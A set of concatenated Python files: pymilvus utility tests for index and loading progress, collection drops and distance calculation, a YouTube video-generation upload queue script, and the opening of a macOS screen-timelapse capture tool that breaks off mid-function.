def test_index_process_collection_indexing(self):
"""
target: test building_process
method: 1.insert 2048 entities to ensure that server will build
2.call building_process during building
expected: 2048 or less entities indexed
"""
nb = 2048
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert (0 < res['indexed_rows'] <= nb)
assert res['total_rows'] == nb
# for _ in range(2):
# assert "indexed_rows" in res
# assert res["indexed_rows"] <= nb
# assert res["indexed_rows"] >= 0
# assert "total_rows" in res
# assert res["total_rows"] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_not_existed(self):
"""
target: test wait_index
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_index_building_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_empty(self):
"""
target: test wait_index
method: input empty collection
expected: no exception raised
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw.create_index(default_field_name, default_index_params)
assert self.utility_wrap.wait_for_index_building_complete(c_name)[0]
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_index(self):
"""
target: test wait_index
method: insert 5000 entities, build and call wait_index
expected: 5000 entity indexed
"""
nb = 5000
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.wait_for_index_building_complete(c_name)
assert res is True
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res["indexed_rows"] == nb
    @pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_without_loading(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
    @pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("nb", [ct.default_nb, 5000])
def test_loading_progress_collection(self, nb):
"""
target: test loading progress
method: 1.insert flush and load 2.call loading_progress
        expected: all entities are loaded, because load is synchronous
"""
# create, insert default_nb, flush and load
collection_w = self.init_collection_general(prefix, insert_data=True, nb=nb)[0]
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_total_entities] == nb
assert res[num_loaded_entities] == nb
    @pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #702")
def test_loading_progress_with_async_load(self):
"""
target: test loading progress with async collection load
method: 1.load collection with async=True 2.loading_progress
        expected: part of the entities are loaded
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load(_async=True)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert (0 < res[num_loaded_entities] <= ct.default_nb)
    @pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_empty_collection(self):
"""
        target: test loading_progress on an empty collection
        method: 1.create collection and no insert 2.loading_progress
        expected: 0 entities are loaded
"""
collection_w = self.init_collection_wrap()
collection_w.load()
res, _ = self.utility_wrap.loading_progress(collection_w.name)
exp_res = {num_loaded_entities: 0, num_total_entities: 0}
assert exp_res == res
    @pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_after_release(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_general(prefix, insert_data=True)[0]
collection_w.release()
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
    @pytest.mark.tags(CaseLabel.L2)
def test_loading_progress_with_release_partition(self):
"""
        target: test loading progress after releasing part of the partitions
method: 1.insert data into two partitions and flush
                2.load collection and release one partition
expected: loaded one partition entities
"""
half = ct.default_nb
# insert entities into two partitions, collection flush and load
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
partition_w.release()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
    @pytest.mark.tags(CaseLabel.L2)
def test_loading_progress_with_load_partition(self):
"""
target: test loading progress after load partition
method: 1.insert data into two partitions and flush
2.load one partition and loading progress
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
collection_w.release()
partition_w.load()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
    @pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_with_partition(self):
"""
target: test loading progress with partition
method: 1.insert data into two partitions and flush, and load
2.loading progress with one partition
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
res = self.utility_wrap.loading_progress(collection_w.name, partition_names=[partition_w.name])[0]
assert res[num_total_entities] == half
assert res[num_loaded_entities] == half
@pytest.mark.tags(CaseLabel.L1)
def test_wait_loading_collection_empty(self):
"""
target: test wait_for_loading
method: input empty collection
expected: no exception raised
"""
self._connect()
cw = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
cw.load()
self.utility_wrap.wait_for_loading_complete(cw.name)
res, _ = self.utility_wrap.loading_progress(cw.name)
exp_res = {num_total_entities: 0, num_loaded_entities: 0}
assert res == exp_res
@pytest.mark.xfail(reason="pymilvus issue #702")
    @pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_complete(self):
"""
target: test wait for loading collection
        method: insert 6000 entities and wait for loading complete
        expected: after loading completes, 6000 entities are loaded
"""
nb = 6000
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
assert collection_w.num_entities == nb
collection_w.load(_async=True)
self.utility_wrap.wait_for_loading_complete(collection_w.name)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_loaded_entities] == nb
    @pytest.mark.tags(CaseLabel.L0)
def test_drop_collection(self):
"""
target: test utility drop collection by name
method: input collection name and drop collection
expected: collection is dropped
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
def test_drop_collection_repeatedly(self):
"""
target: test drop collection repeatedly
method: 1.collection.drop 2.utility.drop_collection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
collection_w.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
        error = {ct.err_code: 1, ct.err_msg: "describe collection failed: can't find collection:"}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
def test_drop_collection_create_repeatedly(self):
"""
target: test repeatedly create and drop same name collection
method: repeatedly create and drop collection
expected: no exception
"""
from time import sleep
loops = 3
c_name = cf.gen_unique_str(prefix)
for _ in range(loops):
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
sleep(1)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_default(self):
"""
target: test calculated distance with default params
method: calculated distance between two random vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors")
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_sqrt(self, metric_field, metric):
"""
target: test calculated distance with default param
method: calculated distance with default sqrt
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default sqrt")
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_metric(self, sqrt):
"""
target: test calculated distance with default param
method: calculated distance with default metric
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default metric")
params = {"sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_binary_metric(self, metric_field, metric_binary):
"""
target: test calculate distance with binary vectors
method: calculate distance between binary vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
nb = 10
raw_vectors_l, vectors_l = cf.gen_binary_vectors(nb, default_dim)
raw_vectors_r, vectors_r = cf.gen_binary_vectors(nb, default_dim)
op_l = {"bin_vectors": vectors_l}
op_r = {"bin_vectors": vectors_r}
log.info("Calculating distance for binary vectors")
params = {metric_field: metric_binary}
vectors_l = raw_vectors_l
vectors_r = raw_vectors_r
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric_binary})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_from_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: both left and right vectors are from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
log.info("Creating vectors from collections for distance calculation")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
log.info("Creating vectors for entities")
params = {metric_field: metric, "sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_collections(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from collections
method: calculated distance between entities from two collections
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
prefix_1 = "utility_distance"
log.info("Creating two collections")
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
collection_w_1, vectors_1, _, insert_ids_1, _ = self.init_collection_general(prefix_1, True, nb)
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors_1[0].loc[:, default_field_name]
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids, "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids_1, "collection": collection_w_1.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance for entities from two collections")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set left vectors as random vectors, right vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = cf.gen_vectors(nb, default_dim)
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
op_l = {"float_vectors": vectors_l}
log.info("Extracting entities from collections for distance calculating")
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between vectors and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set right vectors as random vectors, left vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = cf.gen_vectors(nb, default_dim)
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between right vector and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from one partition entities
method: both left and right vectors are from partition
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
log.info("Extracting entities from partitions for distance calculating")
vectors_l = vectors[i].loc[:, default_field_name]
vectors_r = vectors[i].loc[:, default_field_name]
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculating distance between entities from one partition")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partitions(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from partitions
method: calculate distance between entities from two partitions
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors[1].loc[:, default_field_name]
log.info("Extract entities from two partitions for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"partition": partitions[0].name, "field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"partition": partitions[1].name, "field": default_field_name}
log.info("Calculate distance between entities from two partitions")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set left vectors as random vectors, right vectors are entities
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_l = cf.gen_vectors(nb // 2, default_dim)
log.info("Extract entities from collection as right vectors")
op_l = {"float_vectors": vectors_l}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
log.info("Calculate distance between vector and entities")
for i in range(len(partitions)):
vectors_r = vectors[i].loc[:, default_field_name]
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set right vectors as random vectors, left vectors are entities
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_r = cf.gen_vectors(nb // 2, default_dim)
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
vectors_l = vectors[i].loc[:, default_field_name]
log.info("Extract entities from partition %d as left vector" % i)
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculate distance between vector and entities from partition %d" % i)
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
class TestUtilityAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multi_collections(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
for name in [c_name, c_name_2]:
res, _ = self.utility_wrap.has_collection(name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multi_collection(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
res, _ = self.utility_wrap.list_collections()
for name in [c_name, c_name_2]:
assert name in res
def test_drop_multi_collection_concurrent(self):
"""
target: test concurrent drop collection
        method: multiple threads drop different collections concurrently
expected: drop successfully
"""
thread_num = 3
threads = []
c_names = []
num = 5
for i in range(thread_num*num):
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
c_names.append(c_name)
def create_and_drop_collection(names):
for name in names:
assert self.utility_wrap.has_collection(name)[0]
self.utility_wrap.drop_collection(name)
assert not self.utility_wrap.has_collection(name)[0]
for i in range(thread_num):
x = threading.Thread(target=create_and_drop_collection, args=(c_names[i*num:(i+1)*num],))
threads.append(x)
x.start()
for t in threads:
t.join()
log.debug(self.utility_wrap.list_collections()[0])
|
youtubequeue.py
|
import os
import settings
settings.generateConfigFile()
import soundfile as sf
from pydub import AudioSegment
import generatorclient
from time import sleep
from subprocess import *
import videouploader
from threading import Thread
import pickle
import datetime
from datetime import timedelta
from PIL import Image
import subprocess
import videoscript
import random
from moviepy.editor import *
# 18:00 19:00 20:00 23:00 00:00 01:00
waitTill = None
scriptIBuffer = []
def loadVideoScripts():
vidsaves = os.listdir(settings.rawvideosaves)
print(vidsaves)
for vid in vidsaves:
if "DS_Store" in vid:
continue
path = settings.rawvideosaves + "/" + vid
with open(path, 'rb') as pickle_file:
script = pickle.load(pickle_file)
videoscript.videoscripts.append(script)
def parseScripts():
for musicType in generatorclient.musicTypes:
if not os.path.exists(settings.assetPath + "/Music/%s" % musicType):
print("Creating Music Path for %s: %s" % (musicType, settings.assetPath + "/Music/%s" % musicType))
os.makedirs(settings.assetPath + "/Music/%s" % musicType)
if len(os.listdir(settings.assetPath + "/Music/%s/" % musicType)) == 0:
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (settings.assetPath + "/Music/%s/" % musicType))
while True:
sleep(10)
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (
settings.assetPath + "/Music/%s/" % musicType))
pass
if scriptIBuffer:
for script in scriptIBuffer:
scriptno = script[0]
print("Parsing Raw Script %s" % scriptno)
scripttitle = script[1]
author = script[2]
ups = script[3]
payload = script[4]
final_script = payload[0]
videotype = payload[1]
video_settings = payload[2]
music_type = payload[3]
thumbnail = payload[4]
characters_amount = payload[5]
youtube_title = payload[6]
youtube_description = payload[7]
youtube_tags = payload[8]
videoscript.VideoScriptEngine(scriptno, scripttitle, author, ups, final_script, videotype, video_settings,
music_type, thumbnail, characters_amount, youtube_title, youtube_description,
youtube_tags)
scriptIBuffer.clear()
else:
print("VIDEO GENERATOR no scripts to parse")
def uploadVids():
pass
"""
if renderedVids:
for vid in renderedVids:
vid.generateMovie()
renderedVids.clear()
loadVideoScripts()
"""
def canUpload():
if generatorclient.last_upload_times is not None:
if generatorclient.last_upload_times == 0:
return settings.uploads_a_day
now = datetime.datetime.now()
vids_within_day = 0
for time in generatorclient.last_upload_times:
time = time[0]
if now.hour >= settings.youtube_api_quota_reset_hour:
if time > now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0):
vids_within_day += 1
else:
if time >= now - timedelta(days=1):
vids_within_day += 1
print("%s Videos uploaded since %s:00" % (vids_within_day, settings.youtube_api_quota_reset_hour))
print("Estimated quote usage %s" % (vids_within_day * 1658))
return settings.uploads_a_day - vids_within_day
return False
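# Worked example for canUpload() (illustrative numbers): with uploads_a_day = 6,
# youtube_api_quota_reset_hour = 18 and three uploads recorded since the last
# 18:00 reset, vids_within_day == 3, the printed quota estimate is 3 * 1658 = 4974,
# and the function returns 6 - 3 = 3 remaining uploads.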
def tickThread():
global waitTill
while True:
sleep(5)
if generatorclient.last_upload_times is None and not generatorclient.isRequestingScripts:
print("No update times available... requesting more")
generatorclient.getLastUploadedScripts()
sleep(5)
if videoscript.videoscripts:
print("Rendering all video scripts...")
for script in videoscript.videoscripts:
script.renderVideo()
if waitTill is not None:
if datetime.datetime.now() > waitTill:
waitTill = None
else:
print("Out of Quote Response... waiting till %s" % waitTill)
if settings.exportOffline:
waitTill = None
if not settings.exportOffline:
if waitTill is None:
amount_to_upload = canUpload()
if type(amount_to_upload) is int:
scripts_available_to_upload = [script for i, script in enumerate(videoscript.videoscripts) if
script.isRendered]
print("Allowed to upload %s videos" % amount_to_upload)
if amount_to_upload > len(scripts_available_to_upload):
amount_to_upload = len(scripts_available_to_upload)
print("Only %s scripts available to upload" % amount_to_upload)
print("Uploading %s video scripts... %s ready to upload (total %s)" % (
amount_to_upload, amount_to_upload, len(videoscript.videoscripts)))
for i in range(0, amount_to_upload, 1):
upload = scripts_available_to_upload[i].uploadVideo()
try:
if upload is False:
now = datetime.datetime.now()
if now.hour > settings.youtube_api_quota_reset_hour:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0) + timedelta(days=1)
else:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
except Exception as e:
print(e)
pass
generatorclient.last_upload_times = None
# elif type(amount_to_upload) is bool:
# print("Can't get last update times")
else:
print("Estimated out of quotes waiting till %s" % waitTill)
else:
print("No video scripts, just chilling...")
if not generatorclient.isRequestingScripts:
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
def initQueue():
## process = subprocess.call("wine /home/royalreddit/Desktop/balcon/balcon.exe -t supnerds -w /home/royalreddit/Desktop/test2.wav", shell = True)
if not os.path.exists(settings.videoqueue_directory):
os.mkdir(settings.videoqueue_directory)
if not os.path.exists(settings.rawvideosaves):
os.mkdir(settings.rawvideosaves)
if not os.path.exists(settings.finishedvideosdirectory):
os.mkdir(settings.finishedvideosdirectory)
if not os.path.exists(settings.overlayPath):
os.mkdir(settings.overlayPath)
if not os.path.exists(f"{settings.currentPath}/TempVids"):
os.mkdir(f"{settings.currentPath}/TempVids")
loadVideoScripts()
generatorclient.connectToServer()
sleep(2)
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
thread = Thread(target=tickThread)
thread.start()
# uploadVids()
if __name__ == "__main__":
begin = True
if not settings.exportOffline:
videouploader.get_credentials()
else:
print("Video Generator launching in export offline mode")
if not settings.noSpeech:
if settings.use_balcon and settings.use_google_tts:
print("You have selected to use both google tts and balcon tts! Please only select one in the config file!")
begin = False
if not settings.use_balcon and not settings.use_google_tts:
print("You have not selected any tts options in the config file!"
" Please set either google tts or balcon tts to true! Not both!")
begin = False
if settings.use_balcon:
command = "%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Success", settings.balcon_voice)
process = subprocess.call(command, shell=True)
if process != 0:
print("Balcon not found. This will work when the following command works in your commandline: %s" % ("%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Test", settings.balcon_voice)))
begin = False
if settings.use_overlay:
if not os.path.exists(f"{settings.overlayPath}/{settings.overlay_image}"):
print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} does not exist! Fix the file name in config.ini or set use_overlay=False")
begin = False
else:
im = Image.open(f"{settings.overlayPath}/{settings.overlay_image}")
width, height = im.size
if width != 1920 or height != 1080:
print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} not of correct dimensions ({width},{height})! Needs to be 1920x1080")
begin = False
if begin:
initQueue()
|
capture_screenlapse.py
|
# #!/usr/bin/env python
"""
Description:
A simple screen capture utility, built with ease of use in mind, possibly buggy.
- Adjust capture speed on the fly (1x,5x,10x)
- Choose which screen to capture (main,external)
- Visual counter of captured images
Instruction:
First make sure you have changed the Record_Path below to a location you wish to save images.
To run on Mac:
open Terminal, type 'python' leave a space and then drop this file onto the terminal window and press enter.
To run on Windows:
open Terminal, type 'python' leave a space and then drop this file onto the terminal window and press enter. - untested
Source: https://twitter.com/KubeDev
Owner: https://twitter.com/KubeDev
"""
import Tkinter as tk
import threading
import time
import sys
import os
import subprocess
from AppKit import NSWorkspace
from time import gmtime, strftime
Record_Path = [ '/Users/kevinflynn/Tools/ScreenCapture/Output/Screen/' ]
Record_Apps = [ 'MonoDevelop-Unity' , 'Unity' , 'Sublime Text' , 'Notepad' ] ## Which Apps are allowed to trigger recording (note you must also select correct screen to record from!)
Record_Speed = 2 ## 1.0 = 1 second ..
Speed_Adjust = 0.0 ## Adjusted value do not edit.
Background_Execute = False
Screen_Type = [ "Main" , "External" ]
Screen_Type_Selected = Screen_Type[0]
Threads = None
image_Count = 0
AppFocus = False
def Thread_Work( id , bgExecute , label ):
def Thread_Exit():
print(" Exiting loop.")
global Background_Execute
global Speed_Adjust
while True:
if bgExecute() == False:
Thread_Exit()
break
Image_Shot()
label()
time.sleep( Speed_Adjust )
print("Thread {}, signing off".format(id))
def Thread_Start( label ):
print "Starting"
global image_Count
global Background_Execute
global Threads
Background_Execute = True
tmp = threading.Thread(target = Thread_Work, args=( id , lambda: Background_Execute , label ))
Threads = tmp
tmp.start()
def Thread_Stop():
global Background_Execute
global Threads
Background_Execute = False
time.sleep(0.1)
if Threads is not None:
        Threads.join()
print('Stopped.')
def Image_CurrentApp():
appInUse = ''
if sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
active_window_name = (NSWorkspace.sharedWorkspace().activeApplication()['NSApplicationName'])
appInUse = active_window_name
return appInUse
def getImageCount( inVar ):
def addZero( t ):
return '0' + t
maxLength = 2
temp = str(inVar)
diff = maxLength - len(temp)
if( diff < 0):
temp = temp[abs(diff):]
if( diff > 0):
for x in range(0, diff):
temp = addZero(temp)
return temp
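# Illustrative behaviour: getImageCount(7) returns '07' (zero-padded to two
# characters), while getImageCount(123) returns '23' (leading digits are trimmed).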
Time_Total = 0
Time_ReadOut = '00:00:00'
def timeAdd():
global Speed_Adjust
global Time_Total
global Time_ReadOut
Time_Total += Speed_Adjust
def timeStr( t, minLength ):
temp = str(t)
if( len(temp) < minLength ):
return '0' + temp
else:
return temp
temp = round( Time_Total, 2)
time_secs = timeStr( int( temp % 60 ), 2)
time_mins = timeStr( int( (temp/60) % 60 ), 2)
time_hrs = timeStr( int( ((temp/60)/60) % 60 ), 2)
Time_ReadOut = time_hrs + ':' + time_mins + ':' + time_secs
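# Worked example: once Time_Total has accumulated to 3725.0 seconds, timeAdd()
# formats it as hours:minutes:seconds, so Time_ReadOut becomes '01:02:05'.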
def Image_Shot():
global AppFocus
if Image_CurrentApp() in Record_Apps or AppFocus == 0:
global Screen_Type
global Screen_Type_Selected
global image_Count
image_Count += 1
timeAdd()
bash_PathChar = '"'
bash_FileName = 'Screen'
bash_FileNameExt = '.jpg'
